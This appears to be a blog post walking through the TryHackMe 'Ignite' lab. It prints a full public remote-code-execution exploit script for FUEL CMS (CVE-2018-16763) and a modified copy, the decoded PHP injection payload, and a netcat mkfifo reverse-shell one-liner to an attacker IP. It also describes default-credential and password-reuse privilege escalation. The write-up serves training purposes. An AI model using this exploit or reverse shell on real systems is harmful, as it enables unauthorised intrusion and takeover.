<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.3.2" /><meta property="og:title" content="Ignite (Try Hack Me)" /><meta name="author" content="Robin Goyal" /><meta property="og:locale" content="en" /><meta name="description" content="I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely communicate the pentest lifecycle." /><meta property="og:description" content="I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely communicate the pentest lifecycle." /><link rel="canonical" href="https://robgoyal.github.io/posts/thm-ignite/" /><meta property="og:url" content="https://robgoyal.github.io/posts/thm-ignite/" /><meta property="og:site_name" content="Robin Goyal" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-09-07T19:30:00-04:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Ignite (Try Hack Me)" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Robin Goyal"},"dateModified":"2022-01-24T21:23:51-05:00","datePublished":"2021-09-07T19:30:00-04:00","description":"I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely communicate the pentest lifecycle.","headline":"Ignite (Try Hack Me)","mainEntityOfPage":{"@type":"WebPage","@id":"https://robgoyal.github.io/posts/thm-ignite/"},"url":"https://robgoyal.github.io/posts/thm-ignite/"}</script><title>Ignite (Try Hack Me) | Robin Goyal</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Robin Goyal"><meta name="application-name" content="Robin Goyal"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/profilepic.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Robin Goyal</a></div><div class="site-subtitle font-italic">Software Developer & Cybersecurity Enthusiast</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="/resume.pdf" aria-label="resume" class="order-3" > <i class="fas fa-file-alt"></i> </a> <a href="https://github.com/robgoyal" aria-label="github" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['robin.goyal.swd','gmail.com'].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="https://www.linkedin.com/in/robingoyal" aria-label="linkedin" class="order-6" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Ignite (Try Hack Me)</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Ignite (Try Hack Me)</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Robin Goyal </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Tue, Sep 7, 2021, 7:30 PM -0400" >Sep 7, 2021<i class="unloaded">2021-09-07T19:30:00-04:00</i> </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Mon, Jan 24, 2022, 9:23 PM -0500" >Jan 24, 2022<i class="unloaded">2022-01-24T21:23:51-05:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1573 words">8 min read</span></div></div><div class="post-content"> <img data-proofer-ignore data-src="https://tryhackme-images.s3.amazonaws.com/room-icons/676cb3273c613c9ba00688162efc0979.png" class="preview-img" alt="Preview Image" ><p>I am currently in the process of completing these boxes on Try Hack Me again in an effort to document my experience, reinforce my knowledge of the topics, and improve my ability to concisely communicate the pentest lifecycle.</p><h2 id="enumeration">Enumeration</h2><p>Let’s begin with an nmap scan of the top 1000 ports.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/nmap.jpg" alt="nmap results" /></p><p>The target is an Ubuntu Linux OS with one open port on port 80, an HTTP web server. We didn’t perform a scan of full range of ports so there may be other ports open but let’s enumerate the HTTP service first before performing a full port scan.</p><h3 id="http">HTTP</h3><p>Some pieces of information that we obtained from the nmap results for this service:</p><ul><li>Running Apache 2.4.10<li>Robots.txt file with 1 Disallow entry<li>Title of page is FUEL CMS (may be an actual CMS product)</ul><p>Checking out the landing page for the web application and we are presented with what looks like the default page for the FUEL CMS. It looks like the developers never bothered modifying the default page which provides critical enumeration data.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/landing.jpg" alt="landing page" /></p><p>Scrolling down to the bottom of the page, we come across a set of default credentials for the Fuel CMS upon installation.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/default-creds.jpg" alt="default creds" /></p><p>If the system administrator of this web application did not modify the default landing page, maybe they did not modify the default credentials.</p><p>Browsing to /fuel (also the disallowed entry in robots.txt), we are presented with the login page for the administrative section of the Fuel CMS.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/login-page.jpg" alt="login page" /></p><p>That worked out beautifully for us! Looks like the system administrator never bothered modifying the default credentials. We are now authenticated to the web service as the administrator of the application.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/admin.jpg" alt="admin page" /></p><h2 id="initial-foothold">Initial Foothold</h2><p>I tried to explore the administrative console looking for opportunities to upload a PHP reverse shell but it doesn’t seem like there were any apparent vectors within the administrative console to make this happen.</p><p>From the default landing page, we know that the version of the CMS is 1.4 and since it is a product supported by a vendor, we can use searchsploit to search for any public exploits.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/searchsploit.jpg" alt="searchsploit" /></p><p>Looks like there is an exploit available for the version of the FUEL CMS that we are attacking! Let’s dump the contents of the exploit as it is a Python script and fairly short.</p><div lang="python" class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
</pre><td class="rouge-code"><pre><span class="c1"># Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: &lt;= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
</span>
<span class="kn">import</span> <span class="n">requests</span>
<span class="kn">import</span> <span class="n">urllib</span>

<span class="n">url</span> <span class="o">=</span> <span class="s">"http://127.0.0.1:8881"</span>
<span class="k">def</span> <span class="nf">find_nth_overlapping</span><span class="p">(</span><span class="n">haystack</span><span class="p">,</span> <span class="n">needle</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
    <span class="n">start</span> <span class="o">=</span> <span class="n">haystack</span><span class="p">.</span><span class="nf">find</span><span class="p">(</span><span class="n">needle</span><span class="p">)</span>
    <span class="k">while</span> <span class="n">start</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">n</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">start</span> <span class="o">=</span> <span class="n">haystack</span><span class="p">.</span><span class="nf">find</span><span class="p">(</span><span class="n">needle</span><span class="p">,</span> <span class="n">start</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">n</span> <span class="o">-=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">start</span>

<span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
	<span class="n">xxxx</span> <span class="o">=</span> <span class="nf">raw_input</span><span class="p">(</span><span class="s">'cmd:'</span><span class="p">)</span>
	<span class="n">burp0_url</span> <span class="o">=</span> <span class="n">url</span><span class="o">+</span><span class="s">"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"</span><span class="o">+</span><span class="n">urllib</span><span class="p">.</span><span class="nf">quote</span><span class="p">(</span><span class="n">xxxx</span><span class="p">)</span><span class="o">+</span><span class="s">"%27%29%2b%27"</span>
	<span class="n">proxy</span> <span class="o">=</span> <span class="p">{</span><span class="s">"http"</span><span class="p">:</span><span class="s">"http://127.0.0.1:8080"</span><span class="p">}</span>
	<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">burp0_url</span><span class="p">,</span> <span class="n">proxies</span><span class="o">=</span><span class="n">proxy</span><span class="p">)</span>

	<span class="n">html</span> <span class="o">=</span> <span class="s">"&lt;!DOCTYPE html&gt;"</span>
	<span class="n">htmlcharset</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">.</span><span class="nf">find</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>

	<span class="n">begin</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">20</span><span class="p">]</span>
	<span class="n">dup</span> <span class="o">=</span> <span class="nf">find_nth_overlapping</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">,</span><span class="n">begin</span><span class="p">,</span><span class="mi">2</span><span class="p">)</span>

	<span class="k">print</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="n">dup</span><span class="p">]</span>
</pre></table></code></div></div><p>I won’t pretend to be able to understand exactly how this is working but we can search for the CVE number (CVE-2018-16763) and try to read through the details of the CVE <sup id="fnref:cve" role="doc-noteref"><a href="#fn:cve" class="footnote" rel="footnote">1</a></sup>. The CVE documentation refers to a GitHub issue for FUEL CMS addressing the vulnerability <sup id="fnref:github" role="doc-noteref"><a href="#fn:github" class="footnote" rel="footnote">2</a></sup>.</p><p>The GitHub issue details that the /fuel/pages/select URL with the filter parameter can lead to code evaluation. If we decode the data after the <code class="language-plaintext highlighter-rouge">filter=</code> with a value of <code class="language-plaintext highlighter-rouge">xxxx = 'cmd:which nc'</code>, we can try to understand the payload.</p><div lang="python" class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="n">xxxx</span> <span class="o">=</span> <span class="s">"cmd:which nc"</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">"%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"</span><span class="o">+</span><span class="n">urllib</span><span class="p">.</span><span class="nf">quote</span><span class="p">(</span><span class="n">xxxx</span><span class="p">)</span><span class="o">+</span><span class="s">"%27%29%2b%27"</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">urllib</span><span class="p">.</span><span class="nf">unquote</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="s">"'+pi(print($a='system'))+$a('cmd:which nc')+'"</span>
</pre></table></code></div></div><p>Without being an expert in PHP, it looks like it’s printing out the word system and then calling the system function to execute the command that we provided. Clearly, this is a MAJOR vulnerability which is why it’s listed with a critical score of 9.8. With a deeper understanding of the exploit, let’s make a few tweaks to the exploit removing the Burpsuite proxy and run it!</p><div lang="python" class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">requests</span>
<span class="kn">import</span> <span class="n">urllib</span>

<span class="n">cms_url</span> <span class="o">=</span> <span class="s">"http://10.10.221.136"</span>

<span class="k">def</span> <span class="nf">find_nth_overlapping</span><span class="p">(</span><span class="n">haystack</span><span class="p">,</span> <span class="n">needle</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
    <span class="n">start</span> <span class="o">=</span> <span class="n">haystack</span><span class="p">.</span><span class="nf">find</span><span class="p">(</span><span class="n">needle</span><span class="p">)</span>
    <span class="k">while</span> <span class="n">start</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">n</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">start</span> <span class="o">=</span> <span class="n">haystack</span><span class="p">.</span><span class="nf">find</span><span class="p">(</span><span class="n">needle</span><span class="p">,</span> <span class="n">start</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">n</span> <span class="o">-=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">start</span>

<span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
	<span class="n">cmd</span> <span class="o">=</span> <span class="nf">raw_input</span><span class="p">(</span><span class="s">'cmd: '</span><span class="p">)</span>
	<span class="n">url</span> <span class="o">=</span> <span class="n">cms_url</span><span class="o">+</span><span class="s">"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"</span><span class="o">+</span><span class="n">urllib</span><span class="p">.</span><span class="nf">quote</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span><span class="o">+</span><span class="s">"%27%29%2b%27"</span>
	<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>

	<span class="n">html</span> <span class="o">=</span> <span class="s">"&lt;!DOCTYPE html&gt;"</span>
	<span class="n">htmlcharset</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">.</span><span class="nf">find</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>

	<span class="n">begin</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">20</span><span class="p">]</span>
	<span class="n">dup</span> <span class="o">=</span> <span class="nf">find_nth_overlapping</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">,</span><span class="n">begin</span><span class="p">,</span><span class="mi">2</span><span class="p">)</span>

	<span class="k">print</span> <span class="n">r</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="n">dup</span><span class="p">]</span>
</pre></table></code></div></div><p>Great! Let’s test the exploit with a simple whoami command.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/47138.jpg" alt="47138 exploit" /></p><p>The exploit returned the output of the whoami command prefixed with the word system as outlined in the red box in the image above along with some PHP errors that we can ignore. Now that we know that the PHP command evaluation is possible, let’s setup a reverse shell to our attacker machine.</p><p>First things first, let’s set up a netcat listener on port 4444.</p><p>Next, let’s check if netcat exists on the system and try to generate a reverse shell with the <code class="language-plaintext highlighter-rouge">-e</code> parameter. That did not trigger the connection. Trying out various payloads through the PayloadAllTheThings repository <sup id="fnref:reverse" role="doc-noteref"><a href="#fn:reverse" class="footnote" rel="footnote">3</a></sup>, the payload that ultimately triggered the reverse connection was the netcat-openbsd payload.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/reverse-shell.jpg" alt="reverse shell" /></p><p>Looks like we got a reverse shell as the www-data user which is the owner of the web application.</p><p>Looking at the users in the /home directory, there is an entry for www-data (unusual) but the user flag is present in this directory as flag.txt.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/user-flag.jpg" alt="user flag" /></p><p>Now let’s proceed to some privilege escalation techniques.</p><h2 id="privilege-escalation">Privilege Escalation</h2><p>If we look back at the landing page, you’ll recall that there is a reference to the database configuration file.</p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/database.jpg" alt="Landing database info" /></p><p>Outputting the contents of the file, we find the username and password for the access to the MySQL server as the user <code class="language-plaintext highlighter-rouge">root</code>.</p><div lang="php" class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre><span class="nv">$db</span><span class="p">[</span><span class="s1">'default'</span><span class="p">]</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
	<span class="s1">'dsn'</span>	<span class="o">=&gt;</span> <span class="s1">''</span><span class="p">,</span>
	<span class="s1">'hostname'</span> <span class="o">=&gt;</span> <span class="s1">'localhost'</span><span class="p">,</span>
	<span class="s1">'username'</span> <span class="o">=&gt;</span> <span class="s1">'root'</span><span class="p">,</span>
	<span class="s1">'password'</span> <span class="o">=&gt;</span> <span class="s1">'mememe'</span><span class="p">,</span>
	<span class="s1">'database'</span> <span class="o">=&gt;</span> <span class="s1">'fuel_schema'</span><span class="p">,</span>
	<span class="s1">'dbdriver'</span> <span class="o">=&gt;</span> <span class="s1">'mysqli'</span><span class="p">,</span>
	<span class="s1">'dbprefix'</span> <span class="o">=&gt;</span> <span class="s1">''</span><span class="p">,</span>
	<span class="s1">'pconnect'</span> <span class="o">=&gt;</span> <span class="kc">FALSE</span><span class="p">,</span>
	<span class="s1">'db_debug'</span> <span class="o">=&gt;</span> <span class="p">(</span><span class="no">ENVIRONMENT</span> <span class="o">!==</span> <span class="s1">'production'</span><span class="p">),</span>
	<span class="s1">'cache_on'</span> <span class="o">=&gt;</span> <span class="kc">FALSE</span><span class="p">,</span>
	<span class="s1">'cachedir'</span> <span class="o">=&gt;</span> <span class="s1">''</span><span class="p">,</span>
	<span class="s1">'char_set'</span> <span class="o">=&gt;</span> <span class="s1">'utf8'</span><span class="p">,</span>
	<span class="s1">'dbcollat'</span> <span class="o">=&gt;</span> <span class="s1">'utf8_general_ci'</span><span class="p">,</span>
	<span class="s1">'swap_pre'</span> <span class="o">=&gt;</span> <span class="s1">''</span><span class="p">,</span>
	<span class="s1">'encrypt'</span> <span class="o">=&gt;</span> <span class="kc">FALSE</span><span class="p">,</span>
	<span class="s1">'compress'</span> <span class="o">=&gt;</span> <span class="kc">FALSE</span><span class="p">,</span>
	<span class="s1">'stricton'</span> <span class="o">=&gt;</span> <span class="kc">FALSE</span><span class="p">,</span>
	<span class="s1">'failover'</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(),</span>
	<span class="s1">'save_queries'</span> <span class="o">=&gt;</span> <span class="kc">TRUE</span>
<span class="p">);</span>
</pre></table></code></div></div><p>Connecting to the MySQL server and searching through the fuel_schema database, we don’t find any useful information so let’s move on to other privesc techniques.</p><p><em>At this stage, I went through the various techniques that I remember such as searching for misconfigured SUID binaries, writable files, and even an execution of LinPEAS but nothing stood out to me. However, it clicked that if the MySQL username and password combo is root, then maybe the system root user also has the same password.</em></p><p><img data-proofer-ignore data-src="/assets/img/posts/thm-ignite/root-flag.jpg" alt="root flag" /></p><p>And voila! Although it isn’t visible, the password for the system root user was <code class="language-plaintext highlighter-rouge">mememe</code>. We have also found the root flag meaning that this box is done! https://unicornsec.com/home/tryhackme-ignite</p><h2 id="useful-commands">Useful Commands</h2><h3 id="netcat-openbsd-reverse-shell">Netcat OpenBSD Reverse Shell</h3><p><code class="language-plaintext highlighter-rouge">rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/bash -i 2&gt;&amp;1 | nc 10.6.5.103 4444 &gt;/tmp/f</code></p><p>Courtesy of Jared from unicornsec <sup id="fnref:jared" role="doc-noteref"><a href="#fn:jared" class="footnote" rel="footnote">4</a></sup>, I’ll use his fantastic summary of this command:</p><ul><li><code class="language-plaintext highlighter-rouge">rm /tmp/f</code>: remove the file if it exists<li><code class="language-plaintext highlighter-rouge">mkfifo /tmp/f</code>: create a named pipe<li><code class="language-plaintext highlighter-rouge">cat /tmp/f |</code>: pipe the contents of the named pipe into the next command<li><code class="language-plaintext highlighter-rouge">/bin/bash -i 2&gt;&amp;1 |</code>: invoke interactive mode with Bash, redirect stderr to stdout and pipe that into the next command<li><code class="language-plaintext highlighter-rouge">nc 10.6.5.103 4444 &gt; /tmp/f</code>: connect netcat to the remote IP/port and output to the named pipe</ul><p>From what I understand, this creates a loop where the data passed to netcat from the attacker machine is sent to the named pipe, which is then piped to the bash process which then pipes the output into the netcat connection and repeat.</p><h2 id="reflection">Reflection</h2><p>The first time I completed this room, I skimmed through this page without reading it carefully and moved onto directory enumeration, brute-force authentication attempts. This made my life far more difficult and I had to look for a hint in writeups to understand how to proceed when it came to the privilege escalation vector. I didn’t bother to take my time and read through the landing page to understand all the details of the application.</p><p>On another note, as I read through other walkthroughs to understand how others approach this box, I realize that I do not take the time and effort to understand how specific commands or exploits work. Even though I’m not an exploit dev, it’s important to take the time to understand what the exploit is doing at a higher level as this elevates your knowledge and puts me slightly above the level of “script kiddie”.</p><p>With the above two points, it’s important to slow down, take the time to understand the finer details as I may miss out on crucial information and use the opportunity to learn the aspects (commands, exploits, etc) that seem foreign to me.</p><p>This room does not contain many rabbit holes and provides a fairly straight forward exploitation path. However, the ability to use public exploits and modify them to use them for our own situation is not a vector that many rooms include which is why I enjoyed Ignite.</p><h2 id="references">References</h2><div class="footnotes" role="doc-endnotes"><ol><li id="fn:cve" role="doc-endnote"><p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-16763">https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-16763</a> <a href="#fnref:cve" class="reversefootnote" role="doc-backlink">&#8617;</a></p><li id="fn:github" role="doc-endnote"><p><a href="https://github.com/daylightstudio/FUEL-CMS/issues/478">https://github.com/daylightstudio/FUEL-CMS/issues/478</a> <a href="#fnref:github" class="reversefootnote" role="doc-backlink">&#8617;</a></p><li id="fn:reverse" role="doc-endnote"><p><a href="https://github.com/swisskyrepo/PayloadsAllTheThings">https://github.com/swisskyrepo/PayloadsAllTheThings</a> <a href="#fnref:reverse" class="reversefootnote" role="doc-backlink">&#8617;</a></p><li id="fn:jared" role="doc-endnote"><p><a href="https://unicornsec.com/home/tryhackme-ignite">https://unicornsec.com/home/tryhackme-ignite</a> <a href="#fnref:jared" class="reversefootnote" role="doc-backlink">&#8617;</a></p></ol></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/cybersecurity/'>Cybersecurity</a>, <a href='/categories/writeups/'>Writeups</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/thm/" class="post-tag no-text-decoration" >thm</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Ignite (Try Hack Me) - Robin Goyal&url=https://robgoyal.github.io/posts/thm-ignite/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Ignite (Try Hack Me) - Robin Goyal&u=https://robgoyal.github.io/posts/thm-ignite/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://robgoyal.github.io/posts/thm-ignite/" data-toggle="tooltip" data-placement="top" 